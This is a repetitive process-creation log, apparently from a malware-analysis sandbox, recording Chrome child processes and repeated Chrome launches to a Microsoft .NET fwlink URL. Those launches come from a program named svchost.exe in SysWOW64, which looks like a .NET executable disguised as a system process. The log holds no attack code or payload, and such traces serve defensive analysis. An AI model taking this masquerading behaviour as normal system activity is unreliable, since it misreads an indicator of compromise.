Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1472 --field-trial-handle=1980,i,15377228353991002800,792711668187999877,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1980,i,5631293592904426678,1728656617054090218,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2012,i,2947015941692405239,17280289242752989468,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1940,i,12539128067224901217,8991374413711119156,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2012,i,4138460331120134385,5683384739135737573,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 --field-trial-handle=1976,i,2517950207159565068,10782540892853908230,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1980,i,683593662308323729,9862283109921041436,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=828 --field-trial-handle=1136,i,5921432477754910368,13753575883471156045,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2000,i,17133631053466548675,5917926669792758127,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=1908,i,16046133886444858587,11187754230774806872,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1980,i,5631293592904426678,1728656617054090218,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1484 --field-trial-handle=1152,i,8013400789958701554,8044825980928044458,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1976,i,9020892517801786784,10645353824597710220,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1972,i,9724548607629697657,13638253049410839489,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2004 --field-trial-handle=1964,i,11798321828357005052,16972695017880113129,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1988,i,12758286000912440692,11284502875771047049,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2000,i,15628247129644466505,3875143643089187018,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1984 --field-trial-handle=1944,i,4936340759003262573,15814975481951039996,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1984,i,3689067430776497247,15300495909368681371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1972,i,8812933395650124059,17698073702536386733,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1936,i,2605296248091638972,4924302696092150325,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1472 --field-trial-handle=1980,i,15377228353991002800,792711668187999877,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1460 --field-trial-handle=1996,i,306334268389520684,17870841813551360438,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1992,i,3378677205698214136,1924167881851413353,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=868 --field-trial-handle=2020,i,696290173973552029,16877605372930337061,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1956,i,12129368793975855261,4084447202771776108,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
